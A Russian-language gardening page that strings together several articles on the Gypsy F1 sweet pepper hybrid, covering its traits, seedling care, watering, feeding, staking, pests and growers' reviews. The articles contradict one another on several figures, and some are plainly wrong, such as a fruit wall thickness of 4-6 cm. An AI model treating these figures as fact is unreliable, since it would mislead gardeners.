13 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец джипси описание

Характеристика перца сорта Джипси

Среди многих голландских сортов имеет большую популярность перец Джипси. Он отличается суперранним типом созревания, неприхотливостью к условиям и простотой в уходе. Устойчив к изменениям погоды и пригоден для выращивания повсеместно в средней климатической полосе.

Перец сорта Джипси

Характеристики сорта

Сорт перца Джипси относится к ультраранним, первые плоды достигают биологического созревания через 55-65 дней от момента высадки рассады. Для получение раннего урожая в теплице семена высевают в начале февраля и пикировку не проводят.

Имеет стабильную урожайность, с одного куста можно за сезон собрать 2-2,5 кг перца. Сорт подходит для выращивания в теплицах и на открытом грунте. Имеет универсальное столовое назначения, подойдет для свежего употребления, приготовления блюд и консервирования.

Описание куста

Куст этого сорта невысокий, в высоту достигает 50-60 см, средне ветвистый. Стебли хрупкие склонны к механическим повреждениям. Корневая система поверхностная находится в земле не глубже 25-30 см. Листья среднего размера, широкие, насыщенно-зеленого цвета. Форма листовой пластины удлиненная, поверхность гладкая.

Цветет куст через 60-70 дней после посева. Цветки мелкие белого цвета, мужского и женского типа. Цветение продолжительное, не прекращается до заморозков. По своей природе перец самоопыляющиеся растения, но возможны случаи перекрестного опыления. Часто переопыляется с горьким перцем, поэтому такие виды лучше сажать на разных грядках на расстоянии друг от друга не менее 10 м.

Описание плода

Плоды сорта Джипси не отличаются крупноплодностью, но имеют красивую ровную форму и равномерные размеры всего урожая. Средний вес 100-120 г, в длину имеет 10-12 см,а в ширину 5-6 см.

Характерные отличия плода:

  • кожица тонкая, плотная с восковым блеском;
  • форма коническая, равномерно сужена к кончику;
  • толщина стенок 4-6 см;
  • мякоть хрустящая однородная;
  • разделен на три камеры;
  • семена светло-желтые;
  • вкус сладкий, содержат 7,5% сахара.

Перцы считаются технически зрелыми, когда окрашиваются в кремово-желтый цвет, полностью вызревший плод имеет насыщенно красную окраску. Семена перца Джипси имеют хорошую всхожесть 75-80%.

Перец сладкий Джипси f1, согласно описанию, нетребователен к уходу, но правильная агротехника позволит получить хорошо развитые кусты, высокую урожайность и ровные правильной формы плоды. Перцам нужен регулярный умеренный полив, рыхление почвы, прополка, подкормка удобрениями и подвязка.

Полив и рыхление

Первый полив проводят в момент высадки рассады. Посадочные лунки проливают водой, а когда влага впиталась, высаживают молодые растения. Через 3-5 дней полив повторяют.

На протяжении сезона кусты поливают по схеме 1 раз в неделю до момента массового плодоношения. Когда завязалась первая партия плодов полив прекращают. Возобновляют после сбора урожая в начале повторного цветения.

Среди основных правил качественного полива нужно выделить:

  1. Вода для полива должна быть отстоянная и теплая (выше 22°С).
  2. Полив проводят в утреннее или вечернее время.
  3. Поливают кусты под корень осторожно, чтобы не размывать почву.
  4. Для полива одного куста достаточно 2-2,5 л воды.

Благотворно влияет на рост рыхление почвы. Это поможет насытить землю кислородом, что улучшает газообменные процессы и увеличит поступление питательных веществ.

Рыхление проводят после полива. А также после дождя. Глубина рыхление зависит от этапа развития растений. До начала цветения рыхление междурядий проводят на глубину 5-7 см. Когда кусты начинают зацветать увеличивают глубину рыхления до 10 см, а к периоду начала плодоношения до 14 см, и постепенно уменьшают до 5-7 см.

Подкормка

Перцу требуется обязательная подкормка

Хорошо растет перец Джипси f1 когда он обеспечен достаточным количеством питательных веществ. Подкормки в период вегетации проводят три раза. Этого будет достаточно для обеспечения растений нужным количеством микроэлементов.

  1. Через 20-25 дней после высадки рассады.
  2. В начале массового плодоношения.
  3. Через две недели после второй.

Удобрения в период роста лучше вносить в жидком состоянии. Для подкормки перцев подойдут органические и минеральные удобрения. В период плодоношения лучше использовать органические удобрения, так как это эколлогично.

Чтобы удобрить растения можно использовать травяной настой, навоз, птичий помет, минеральные удобрения.

  1. Травяной настой. Для приготовления берут 2-3 кг разной свежей травы (крапива, одуванчик, газонная трава, лекарственные травы), заливают 10 л воды и оставляют на 5-7 дней для брожения. Готовый настой смешивают с водой в пропорции 1:10 и поливают или опрыскивают кусты.
  2. Птичий помет. Хорошо подойдет куриный или голубиный, на 10 л воды достаточно 250 г помета. Раствор настаивают 3-5 дней, иногда помешивают. На ведро воды добавляют 0,5 л приготовленной прикормки. Поливают вокруг куста на расстоянии 20-30 см от ствола, избегая попадания на листья.
  3. Минеральные удобрения. Используют суперфосфат вместе с карбамидом. Берут по 10 г каждого удобрения и растворяют в 10 л воды. Поливают кусты в послеобеденное время. Для одного куста достаточно ½ л раствора.

Важно помнить, что все подкормки нужно вносить по предварительно увлажненной почве, а при приготовлении сохранять дозирование.

Подвязывание

Этот сорт требует подвязки. Согласно описанию, кусты Джипси f1 имеют хрупкие стебли, которые могут повреждаться под весом плодов и от ветра. Чтобы подвязать растения возле каждого куста в момент высадки рассады устанавливают опору. Для этого сорта достаточно будет вбить колья высотой 60-70 см. Привязывают основной стебель тканевыми полосками в нескольких местах на разной высоте. Не нужно сильно притягивать стебель к опоре, подвязка должна удерживать растение, но не ограничивать свободный рост.

Болезни и вредители

Болезни

Джипси проявляет сильную устойчивость к табачной мозаике.

Требует профилактической обработки от фитофторы, склеротинии, серой и вершинной гнили, бактериальной пятнистости. Профилактика улучшает иммунитет растений, а также повышает сопротивляемость. Для такой обработки можно использовать йод, перекись, биофунгициды.

Йод или перекиси используют для опрыскивания кустов, 1 ст. л. препарата растворяют в 10 л воды. Обработку проводят каждые 14-21 дня. С биофунгицидов можно использовать Триходермин или Гаупсин. Применяют в соответствии инструкции, соблюдая дозирование и способ использования.

Вредители

Перец, как и другие пасленовые могут поражаться такими вредителями как:

Для предупреждения поражения вредителями используют травяные настои, которые имеют свойство их отпугивать. Для этой цели подойдут полынь, лук, картофельная ботва.

  1. Для приготовления настоя берут 200 г луковой шелухи или полыни и заливают 10 л горячей воды, настаивают 3-4 дня. Полученным настоем опрыскивают кусты и поливают грядку.
  2. Просто приготовить настой из картофельной ботвы, нужно взять 2 кг зеленых листьев и стеблей и залить 10 л теплой воды, настаивать 2-4 часа. Тщательно опрыскать растения.
  3. К настоям можно добавлять жидкое мыло (30 г на 10 л), которое будет способствовать равномерному покрытию и прилипанию средства к листьям.

В случае, если такие народные средства не дали ожидаемого результата, можно использовать специальные инсектициды (Актеллик, Актара), соблюдая указания в инструкции.

Характеристика и описание гибрида перца Джипси F1, выращивание и уход

Практически в любом приусадебном хозяйстве овощеводы стремятся выращивать овощи для личного употребления. В ассортимент культур неизменно входит и болгарский перец. Многие огородники останавливают свой выбор на ранних и урожайных голландских гибридах. Одной из таких разновидностей является перец Джипси F1. У этого относительно нового гибрида имеются замечательные качества, которые делают его хорошим выбором для любого овощевода. Узнайте о них и присоединяйтесь к почитателям этого перца.

Характеристики и описание гибрида

Гибрид Джипси выведен голландской фирмой MONSANTO HOLLAND B. V. В Россию семена поставляет ее дочерняя компания Seminis. В Госреестр РФ гибрид включен в 2007 г. Допущен к возделыванию по всей территории России. Предназначен для выращивания в ЛПХ. Перец можно сажать на грядках в открытом грунте и в теплицах.

Это раннеспелый гибрид, самые первые перцы будут готовы к употреблению уже через 2 месяца после высадки на грядки рассады. Использование плодов – универсальное.

По описанию оригинатора перцы Джипси имеют следующие характеристики:

  • кусты средней высоты, полураскидистые;
  • листья средней величины, зеленого окраса, слабоморщинистые;
  • перцы пониклые, глянцевые, цилиндрической формы, размером 10 на 6 см;
  • цвет плодов в фазе технической спелости – светло-желто-зеленый, спелых перцев – красный;
  • толщина стенок – 5-7 мм;
  • на вкус сладкие, сочные, без горечи, с приятным ароматом;
  • число семенных камер – 2-3 шт.

Урожайность перца Джипси F1 при выращивании на открытом грунте — 3,7-4,2 кг/м 2 при средней массе плодов 100-120 г.

Плоды сладкого перца Джипси пригодны к употреблению свежими, для приготовления различных блюд, например лечо и икры из овощей, консервирования: маринования, соления, а также для фарширования и заморозки. Их можно транспортировать, пригодны для непродолжительного хранения.

Достоинства и недостатки

  • он раннеспелый;
  • имеет хорошую приспосабливаемость к различным погодным условиям;
  • нетребователен к почвам и уходу;
  • у него небольшие компактные кусты;
  • устойчив к ВТМ;
  • удобной формы и размеров плоды отличного вкуса;
  • собранные перцы имеют отличный товарный вид;
  • обладает высокой урожайностью;
  • выделяется универсальностью применения.

Недостатков у гибрида Джипси F1 нет, кроме того, что у него тонкие и часто непрочные стебли, которые могут сломаться под весом спеющих плодов, поэтому его невысокие кусты нуждаются в подвязке.

Агротехника выращивания и ухода

Перцы Джипси F1 одинаково неплохо растут как в открытом грунте, так и в парниках. В регионах с продолжительным теплым летом их высаживают на грядках, различные виды теплиц используют на севере, а также для получения раннего урожая. И в том, и в другом случае сначала выращивают рассаду, а с наступлением тепла переносят растения на постоянное место.

Перец предпочитает легкие, рыхлые, плодородные суглинистые почвы с нейтральной кислотностью, много солнца и тепла. Потому под эту культуру выделяют участки с достаточным освещением, а для лучшего прогревания грунта грядки поднимают. Почву для высадки растений на огороде готовят с осени, в теплице – за 1-2 недели до высадки рассады.

Перец требователен к питанию на всем периоде вегетации, следовательно, основные компоненты – азот, фосфор и калий, — обязательно вносят при заправке грунта. Под перекопку добавляют до 10 кг перегноя или перепревшего компоста, мочевину, золу или по полной норме фосфорно-калийные минеральные удобрения. Кислые почвы предварительно известкуют.

В качестве предшественников выбирают участки где ранее росли огурцы, ранняя капуста, лук или зелень. Не рекомендуется высаживать культуру по овощам семейства пасленовых, которые являются родственниками перца и имеют сходные предпочтения в питании, одинаковые болезни и вредителей.

К выращиванию рассады для теплиц приступают в конце февраля – середине марта. Чтобы высадить растения на грядки в открытом грунте, посев семян проводят позже, примерно на 2 недели. Для этого подготавливают пластиковые или торфяные горшочки объемом 200-300 мл, грунт для овощей. Перец относится к культурам, которые плохо реагируют на пересадку, поэтому опытные огородники выращивают его без пикирования, сразу сажая в индивидуальные емкости.

Принадлежность перца Джипси к гибридам говорит том, что семена для посадки придется покупать в магазинах каждый год. Следовательно, в их прогревании, протравливании, замачивании и проращивании нет необходимости. Качественный семенной материал можно высаживать сухим. В почве есть все необходимое для его быстрого прорастания.

Семена перца на рассаду высевают в хорошо увлажненный грунт не глубже 1-1,5 см. Емкости сверху накрывают пленкой и оставляют до появления всходов при t 25-30 °C. После укрытие снимают, рассаду неделю выдерживают при 16-18 °C днем и 14 °C ночью для предотвращения вытягивания и образования мощной корневой системы. В остальной период выращивания поддерживают температурные показатели около18-25 °C, 12-14 часовой световой день.

Поливают рассаду регулярно по мере подсыхания в стаканчиках верхнего слоя грунта, каждые 1,5-2 недели подкармливают растения комплексными препаратами с микроэлементами. При необходимости используют стимуляторы роста. За 7-10 дней до предстоящей пересадки в грунт их закаливают.

Высадка рассады в теплицы возможна в мае, на открытые грядки растения переносят позже, примерно в июне, при минимальной температуре почвы 16 °C. Перцы Джипси располагают по схеме 40 на 40 или 50 на 70 см. Незадолго до проведения работ рассаду обильно поливают. При пересадке перец заглубляют по корневую шейку, грядки обязательно поливают.

Поливают кусты водой с температурой 20-25 °C. Холодная жидкость может вызвать стресс и остановку роста корневой системы, что не лучшим образом отразится на растениях. Орошение проводят в вечернее время под корень, после землю рыхлят, чтобы не образовывалась корка.

Перцы поливают 1 раз в 2-3 дня, выливая воду под корень, так как эти растения имеют горизонтально расположенную корневую систему, расходуя 0,5-1 л воды в фазе цветения и 1,5 л в период плодоношения. Почва должна быть постоянно умеренно влажной, но без образования луж. Примерно за 2-3 недели до уборки последнего урожая полив полностью прекращают.

Если появляются сорняки, проводят прополку. Но, многие огородники мульчируют грядки сеном, травой или соломой, что позволяет сохранить влагу и реже работать инструментом. В теплицах для уменьшения влажности на 1-2 часа оставляют двери и форточки открытыми.

Подкормку осуществляют несколько раз за сезон. Первый раз перец удобряют через 1,5-2 недели после пересадки. В ведре разводят 10 г карбамида и 5 г суперфосфата. Растения поливают под корень. При наличии органики используют настой коровьего навоза или помета птиц.

Вторую подкормку перцев проводят в период цветения растений. Используют комплексные препараты с группой микроэлементов, травяные чаи с добавлением золы, состав из мочевины (10 г), калия сульфата (20 г), суперфосфата (30 г).

После уборки первых плодов удобряют перец в третий раз, применяя фосфорно-калийные препараты. Например, растворяют в 10 л тот же суперфосфат и сульфат калия, но теперь дозировку последнего увеличивают вдвое. Во всех случаях выливают по 1 литру раствора под 1 корень. При попадании вещества на листья и плоды, подкормку смывают чистой водой, чтобы не было химических ожогов.

Применяют для перца Джипси и внекорневые подкормки. В качестве удобрений используют борную кислоту, которая стимулирует образование завязи, зольный раствор, содержащий фосфор и калий. Из народных средств применяют травяные и дрожжевые настои, отвар шелухи лука, который, кроме питательного, обладает еще и профилактическим эффектом, то есть защищает растения от болезней.

Опрыскивания проводят обязательно в вечерние часы, в отсутствие солнца, чтобы на листьях не образовывались ожоги. Внекорневое питание при сочетании с корневым значительно повышает жизнестойкость растений и стимулирует плодообразование.

Собирают перец в технической стадии зрелости, что ускоряет закладку, формирование и вызревание следующей волны урожая.

Перец Джипси F1: описание и характеристика, отзывы и фото гибрида

Перец Джипси F1: описание, отзывы и фото гибридного сорта

Еще несколько десятилетий назад вырастить сладкий болгарский перец можно было только в некоторых российских регионах с достаточно длинным теплым периодом. А в средней полосе, Сибири или на Урале, где лето – короткое, погодные условия нестабильны, выращивать такую овощную культуру было очень трудно, а урожайность перцев была гораздо ниже заявленной в аннотации к сорту.

Но в настоящее время многие дачники высаживают новые сорта болгарского перца, выводимые российскими селекционерами, а также специалистами из других стран мира.

В данной статье будет рассказано про перец сорта Джипси F1, про его основные характеристики, а также о многом другом.

История сорта

Гибридный сорт болгарского перца Джипси F1 был выведен голландскими селекционерами в начале 2000 годов. В процессе работы по выведению нового гибрида селекционеры ставили перед собой задачу получить такой сорт, который отличался бы улучшенными характеристиками: суперранним сроком созревания урожая, устойчивостью к изменениям погодных условий, а также обладал стойкостью к большинству болезней.

Фото перца Джипси

Гибридный перец Джепси полностью отвечает этим требованиям, поэтому стал популярен не только у голландских фермеров, но и у овощеводов в других европейских странах. В Россию семена данного сорта попали в начале 2007 года, в сразу же гибрид был внесен в Госреестр страны. Перец Джипси районирован для выращивания в большинстве регионов России в открытом грунте и в пленочных или поликарбонатных теплицах.

В России семенной материал данного сорта распространяется фирмой Сименис, а также некоторыми российскими компаниями («Семена Алтая», «Лита Черноземье», «Агрос» и другие).

Сладкий перец Джипси: характеристика и описание сорта

Болгарский перец Джипси относят к ультраранним сортам – с момента появления ростков до сбора спелых плодов проходит около 3 месяцев. Многие овощеводы говорят, что с момента пересадки рассады этого перца на постоянное место до сбора зрелых плодов проходит около 2 месяцев.

На постоянное место рекомендуется высаживать сеянцы в возрасте около 60 дней, когда на растениях появилось не менее 3 пар настоящих листочков.

Перец Джипси F1 фото

Хотя овощеводы противоречивы в своих мнениях по поводу того, сколько времени проходит от посадки до сбора урожая этого перца, но одно можно сказать точно – данный сорт по созреванию плодов является одним из самых ранних среди всех разновидностей этой овощной культуры.

Кустики в высоту могут достигать 0,45-0,5 м, достаточно компактные, полураскидистые. Побеги – средней толщины, не слишком мощные, поэтому в период активного созревания урожая их рекомендуется повязывать к опорам.

Стебли этой овощной культуры облиственны средне, листва – слегка морщинистая, ее размер – средний, окраска – насыщенно изумрудная.

Спеющие плоды опущены книзу, среднего размера, в длину достигают 12-15 см, а в диаметре – до 6,5 см. вес спелых перчиков – 110-130 г при толщине стенок около 4 мм.

Форма спеющих перчиков – ровная, коническая, внутри может быть до трех гнезд с семенами. Мякоть слегка хрустит, достаточно сладкая, горечи плоды не имеют. Запах спелых плодов – типичный для перца, выражен ярко. Кожица – достаточно прочная, блестящая. Зрелые перцы сорта Джипси – зеленовато-желтой окраски, но может быть и восковой. В процессе созревания окраска кожицы становится насыщенно алой.

Спелые перчики используют для фаршировки, добавляют в салаты, используют в консервации (готовят лечо, овощную икру).

Собранный урожай хорошо переносит перевозку на дальние расстояния, отличается высокой лежкостью.

Урожайность перца Джипси F1

При выращивании перца Джипси в открытом грунте с одного квадрата обычно собирают до 4-4,2 кг спелых плодов. Количество завязей, появляющихся на кустике болгарского перца, зависит от погоды, в среднем на каждом овощном растении может завязываться 8-13 штук перчиков.

Так как на побегах мало листьев, чтобы на плодах не появлялись ожоги от солнечных лучей, в жаркую погоду растения требуется притенять.

Перец Джипси: посадка, выращивание и дальнейший уход за гибридом

В большинстве российских регионов этот сорт рекомендуется выращивать рассадным способом. Высевать семенной материал на рассаду рекомендуется в середине – конце марта.

Грунт для посадки можно покупать в специализированных магазинах, а семена перца Джипси высевать в отдельные стаканчики. Семенной материал заглубляют на глубину около 1,5 см, сверху накрывают полиэтиленовой пленкой и оставляют в помещении с температурой не ниже 25-27 градусов Цельсия.

После появления дружных всходов пленку убирают, а температуру снижают до 16 градусов Цельсия днем и до 13-14 градусов в ночные часы. В таких условиях рассаду выдерживают 6-8 дней, затем температуру можно повысить до 19-22 градусов, а продолжительность светового дня должна быть около 13 часов в сутки.

Поливать растущие сеянцы следует по мере подсыхания верхней части почвы. Подкармливать рассаду сорта Джипси нужно раз в 12-15 дней комплексными минеральными удобрениями. За неделю до пересадки рассады на постоянное место требуется закаливать сеянцы.

В теплицу подросшие сеянцы высаживают во второй декаде мая, а на грядки в огороде – не раньше начала июня.

После высадки сеянцев на постоянное место, дальнейший уход за перцами Джипси заключается в регулярных поливах, рыхлении почвы, прополке, а также регулярных подкормках.

Болезни и вредители

Данный гибрид обладает высокой устойчивостью к вирусу табачной мозаики, ряду грибковых болезней, которые обычно поражают многие сорта и гибриды других овощных растений из семейства пасленовых.

Достоинства перца Джипси

К основным достоинствам гибрида Джипси специалисты относят:

может приспособиться к разным климатическим условиям;

может выращиваться на любых типах грунта, не требует особого ухода;

кустики – компактные, среднего размера;

имеет высокую устойчивость к вирусу табачной мозаики;

плоды имеют хороший товарный вид, а также приятный вкус;

урожайность сорта – высокая;

  • собранные плоды – универсального назначения.

Благодаря своим положительным характеристикам этот болгарский перец стал популярным у многих овощеводов в России, которые выращивают его не только в открытом грунте, но и в теплицах из поликарбоната.

Перец Джипси отзывы дачников, кто сажал

Дачники, выращивающие перец Джипси на своих грядках, часто оставляют отзывы об этом болгарском перчике на специально созданном форуме. Некоторые отзывы о перце Джипси приведены ниже:

Гибрид перца Джерси можно выращивать практически в любых регионах России, так как он хорошо растет в открытом и закрытом грунте, а урожай можно собирать тогда, когда у большинства сортов перцев только начинают завязываться плоды.

Перец Джипси F1: описание и характеристика от производителя

Раннеспелый гибрид. Растение полураскидистое, среднерослое. Плоды пониклые, цилиндрические, 3-4-гнездные, длиной 10 см, диаметром 6 см, массой 100-150 г, толщиной стенки 6-8 мм, глянцевые. Окраска незрелых плодов желтая, зрелых – красная. Устойчив к вирусу табачной мозаики. Рекомендуется для использования в свежем виде, домашней кулинарии и консервирования. Урожайность 3,7-4,5 кг/м2.

Перец Джипси F1: отзывы, фото, особенности гибрида

Большинство гибридов ценятся за высокую урожайность, неприхотливость при культивировании и раннеспелость. Именно таким характеристиками наделен перец Джипси, получивший популярность среди огородников. Гибрид универсального назначения подходит для выращивания, как на незащищенных грядках, так и под укрытиями (парники, теплицы и т.п.). Перец позиционируется как морозо- и болезнеустойчивый.

Общее описание

Джипси – ультраскороспелый гибрид, достигающий стадии молочной спелости спустя 85-90 дней после появления массовых всходов сеянцев.

Перец был выведен голландскими селекционерами в начале 21 века. Внесен в Госреестр РФ и допущен для культивирования повсеместно. Семена поставляются в Россию агрофирмой Seminis, отличаются высокой всхожестью.
Перец Джипси F1 имеет полураскидистый куст, малооблиственный, высотой чуть более полуметра. Из-за слабых стеблей и многоплодности растения требуют обязательной подвязки.

Широкие, но небольшие листья растения наделены насыщенным темно-зеленым окрасом.

Характеристика плодов

На стадии технической спелости плоды Джипси салатового окраса. По мере созревания стручки обретают яркий красный цвет (см. фото).

Перцы конической формы, достигают в длину 10-15 см, в диаметре не превышают 6 см в самой широкой части. Толщина перикарпия составляет 5-6 мм. Внутри плод трехкамерный. Вес одного овоща может составлять от 120 до 180 гр.

Кожица у овоща не толстая, но достаточно прочная. Благодаря этому плоды хорошо переносят перевозки на дальние расстояния и долго сохраняют товарные качества после снятия с куста.

Вкусовые качества

Несмотря на то, что сладкий перец Джипси относится к ультраскороспелым, его вкусовые качества оцениваются на отлично. Плоды мясистые и сочные, наделены ярко выраженным перечным ароматом. Вкусовые характеристики раскрываются в полную меру только при достижении биологической зрелости овощей.

Плоды используют для приготовления салатов, употребляют в свежем виде, фаршируют, консервируют, добавляют в первые и вторые блюда.

Урожайность

В характеристике и описании сорта Джипси F1 указано, что при соблюдении правил агротехники с 1 кв. м. посадок можно получить до 4,5 кг урожая. На одном кусте в среднем формируется 10-12 плодов. Ориентировочно каждое растение приносит 1,5 кг овощей.

Посадка и уход

Высевать семена на рассаду при дальнейшем выращивании в условиях теплицы можно в конце февраля – начале марта. Если подразумевается культивирование растений в открытом грунте, сроки посадки переносят на месяц (конец марта – начало апреля).

На постоянное место рассаду высаживают в мае – июне (для каждого региона индивидуально), когда минует опасность возвратных заморозков. В момент пересадки сразу организовывают опоры, к которым будет фиксироваться куст.

Гибрид Джипси имеет слабую корневую систему, поэтому болезненно переносит процедуру пикировки. Опытные огородники, выращивающие этот перец не первый год, рекомендуют отказаться от пересаживания. Рациональнее сажать семена сразу по одному или два в отдельные емкости.

При пересадке на постоянное место на одном квадратном метре размещают до 4 растений. Из-за малооблиственной кроны Джипси подходит для загущенной посадки. Это позволяет кустам притенять друг друга, уберегая плоды от воздействия ультрафиолета.

Для лучшей проветриваемости кустов, с целью профилактики заболеваний удаляют все боковые побеги и листья до первой развилки.

Джипси требует полив каждые 3-4 дня, отзывчив на внесение удобрений. Подкормки проводят до 3 раз за сезон органикой или минеральными комплексами.

Болезнеустойчивость

Перец сладкий Джипси F1 генетически устойчив к вирусу табачной мозаики. На юге гибриду часто удается уйти от фитофторы из-за раннего созревания.

Для профилактики других болезней проводят обработку растений биофунгицидами до 3 раз за сезон. Листья и стебли куста регулярно осматривают на предмет наличия вредителей.

Снизить риск развития заболеваний помогут такие мероприятия, как соблюдение севооборота, размещение рядом сидератов, исключение соседства с огурцами, регулярное проветривание теплиц, удаление отмерших листочков, регулярная прополка и рыхление почвы или мульчирование.

Достоинства и недостатки

По отзывам огородников, выращивающих Джипси на своем участке, у гибрида можно выделить следующие преимущества:

  • ранний период созревания;
  • отличный перечный вкус плодов;
  • морозоустойчивость;
  • болезнеустойчивость;
  • хорошо себя чувствует в открытом грунте;
  • имеет высокие показатели урожайности;
  • подходит для универсального использования в кулинарии;
  • долго хранится в домашних условиях;
  • переносит длительные перевозки без утраты товарных качеств.

Среди недостатков пользователи выделяют необходимость подвязывания кустов из-за их хлипкости и слабо развитую корневую систему, требующую от огородника осторожности при пересадке.

Похожие гибриды

Перец Джипси по описанию и характеристике имеет сходства со следующими гибридами:

Буратино относится к высокорослым гибридам, вырастающим до 1 метра при условии культивирования в теплицах. В открытом грунте куст редко превышает 0,7 м. Стадии технической зрелости перец достигает через 3 месяца после всходов сеянцев. Плоды венгерского типа (конусовидные) массой 120 гр. и длиной до 17 см. Толщина перикарпия в среднем составляет 5 мм. С учетом плотности посадок от 5 до 8 растений на квадратном метре, собирают 11-14 кг урожая соответственно. При наступлении биологической спелости плоды обретают темно-красный окрас.

Темп F1 – скороспелый и засухоустойчивый перец. Кусты среднерослые, не превышающие 60-70 см. Плоды в виде конуса, красного цвета, массой 100-120 гр. Урожайность с кв. м. составляет от 6 до 9 кг, в зависимости от условий культивирования.

Адлер относится к среднеранним гибридам со сроками созревания 98-112 суток от начала момента вегетации. Куст высокий, до 1,3 м, штамбовый, среднеоблиственный. Гибрид хорошо адаптирован к неблагоприятным погодным условиям. Цвет плодов при полной спелости красный. Средний вес одного экземпляра – 140 гр. К болезням растение имеет среднюю устойчивость.

Фишт имеет ранние сроки созревания. После высадки рассады в грунт гибрид отдает урожай уже спустя 50 дней. Конусовидные спелые перцы красной окраски, массой до 180 гр. Плоды очень толстостенные – до 1 см, отдельные экземпляры имеют перикарпий до 2 см. Растение хорошо переносит недостаток влаги и жару.

Адмирал F1 приносит урожай спустя 100 дней после появления всходов. Куст вырастает до 1-1,3 м. Конусовидные плоды с толщиной стенок 6 мм весят от 140 до 150 гр. При полном вызревании приобретают красную окраску. Гибрид устойчив к засухе и болезням, овощи обладают хорошей транспортабельностью. Показатели урожайности – 5,4-6,2 кг.

Отзывы огородников

Перец Джипси по отзывам огородников является одним из самых раннеспелых, высокоурожайных и неприхотливых гибридов. Он хорошо переносит низкие температуры, редко болеет. Максимальную продуктивность овощная культура показывает в условиях закрытого грунта.

«Сажаю этот гибрид уже 5-й год у себя на огороде. Плоды завязываются отлично. Уже к началу июля кусты увешаны перчиками. Для гибрида Джипси имеет отличный вкус. Единственное, что не нравится в этом перце, так это слабые стебли. Их нужно обязательно подвязывать, иначе куст сломается под тяжестью своих плодов».

«Высаживаю каждый год всего несколько кустиков сладкого перца Джипси Ф1 для получения раннего урожая. В основном использую для свежих салатов. Выращиваю в теплице, поэтому в начале июня наша семья уже кушает перцы с собственного участка».

«Несмотря на то, что Джипси относится к раннеспелым перцам, сроки созревания все же зависят от погодных условий, по крайней мере в открытом грунте. Если лето очень холодное, то получить урожай раньше конца июля не получится».

«Болгарский перец одна из моих любимых овощных культур. Отдаю предпочтение ранним сортам и гибридам, так как среднеспелые и позднеспелые просто не успевают вызревать в нашем регионе с коротким летом. Одним из моих любимчиков уже который год остается Джипси. В первую очередь он мне нравится за хорошую урожайность, каждый кустик буквально облеплен перчинами».

Гибрид из Голландии — перец «Джипси»: описание и инструкция по выращиванию

Даже на небольшом садовом участке дачники стремятся вырастить сладкий перец. Но разнообразие сортов затрудняет выбор. Опытные садоводы рекомендуют гибрид Джипси F1. Выбрав эту культуру, вы точно не разочаруетесь.

Из статьи вы узнаете обо всех преимуществах и характеристиках гибрида Джипси, особенностях выращивания и возможных трудностях агротехники.

Что это за перец

Рассмотрим подробно, что представляет собой перец Джипси, его основные характеристики и отличительные черты.

Гибрид F1

Гибрид Джипси F1 вывела в 2005 году голландская фирма Monsanto Holland . На российский рынок семена перца поставляет компания Semenis. В 2007 году гибрид включили в Государственный реестр селекционных достижений, используемых для выращивания на территории РФ.

Этот перец чаще всего сажают на приусадебных участках и огородах. При соблюдении агротехники и правил ухода рекомендован к выращиванию на Урале и в Сибири (под пленочным укрытием).

Характеристика и описание гибрида

Джипси относится к раннеспелым голландским гибридам. Первые плоды появляются уже через 60 дней после высадки рассады на грядки. Гибрид предназначен для выращивания в теплице и в открытом грунте.

Перец Джипси имеет универсальное столовое назначение. Его употребляют в пищу в свежем виде, используют в приготовлении различных блюд и консервируют.

Отличительные черты

Кусты у растений вырастают средних размеров, ветви – полураскидистые, стебли не прочные.

Внимание! Чтобы перец не падал от порывов ветра и под тяжестью плодов, его сразу после высадки призывают к опорному колышку.

Лиственный покров у перца — ярко-зеленый.

Характеристика плодов, урожайность

Плоды гибрида Джипси некрупные, но форма у них ровная. Вес одного перчика в среднем 110 г. Длина — 10-11 см, ширина – 5-6 см.

Особенности плодов:

  • кожица тонкая, но плотная;
  • форма конусообразная, постепенно сужается кверху;
  • стенки толщиной 5-6 мм;
  • мякоть сочная, хрустящая;
  • вкус сладкий, без горечи и остроты;
  • устойчивы к растрескиванию.

Важно! Перцы становятся технически зрелыми, если они окрасились в желтый цвет. Только полностью созревший плод имеет ярко красный цвет.

Гибрид Джипси стабильно урожайный. За сезон с одного растения можно собрать от двух до 2,5 кг перца.

Подготовка к выращиванию

Перед посевом семена опускают в слабый раствор марганцовки. Те, которые всплыли, выбрасывают, а остальные промывают под проточной водой, просушивают и высеивают в подготовленный грунт.

Для Джипси, как и для многих других сортов, подойдет супесчаная или суглинистая почва с комочками и гумусом.

Сажать семена перца для рассады лучше с середины февраля до середины марта. Затем ее высаживают в теплицу примерно в конце мая. А вот для открытого грунта семена сажают на несколько недель позже, высаживая рассаду в середине июня.

Перец Джипси считается неприхотливым, но чтобы получить большой урожай, важно соблюсти несколько условий:

  1. Предпочтителен теплый грунт, поэтому желательно делать грядки, похожие на небольшие холмики высотой 40-50 см.
  2. Из-за малой облиственности растений в период вегетации нужно выбирать более затененные места, чтобы кусты и плоды не сгорели от яркого солнца.

Другие голландские гибриды:

Выращивание рассады

Вырастить рассаду перца не составит большого труда, если знать, как это правильно сделать.

Посадка перца

В пикировочном варианте семена сажают в общий контейнер в предварительно увлажненный грунт на глубину 1 см. Если без пикировки, то сажать нужно сразу в отдельные емкости.

Для надежности всходов можно взять 2-3 семени на одну посуду — впоследствии оставить наиболее сильное растение. Затем емкость накрывают пленкой и ставят в теплое место — например, к батарее. В основном семена всходят в течение недели, иногда чуть больше.

После пленку снимают и держат рассаду при температуре +16-18 °С днем и +14 °С ночью в течение недели. Это нужно, чтобы предотвратить вытягивание и образование мощной корневой системы у перцев. В остальной период температуру поддерживают в пределах +18-25 °С.

Дальнейший уход

Поливают рассаду регулярно по мере высыхания верхнего слоя почвы. Пикировку проводят только тогда, когда вырастут два верхних листочка.

В период роста растений делают несколько подкормок минеральными удобрениями. Первый раз — через 7 дней после пикировки, либо через 14 дней после всходов, если сажали без пикировки. Второй раз подкармливают на 11-12 день после первого раза. Третий раз удобрения вносят за пару дней до пересадки рассады в открытый грунт или теплицу.

Пересаживают рассаду на постоянное место аккуратно, чтобы не сломать хрупкие стебли растения. Перед посадкой в углубление кладут удобрения, лучше всего подойдет перегной. Перцы сажают в ряд на расстоянии около 30 см друг от друга, а между рядами оставляют до 50 см.

Важно! В период цветения, когда начинает формироваться плод, рекомендуют увеличить частоту поливов.

Особенности выращивания и возможные трудности

Для начала стоит определиться с местом выращивания и с точным временем высадки в постоянный грунт.

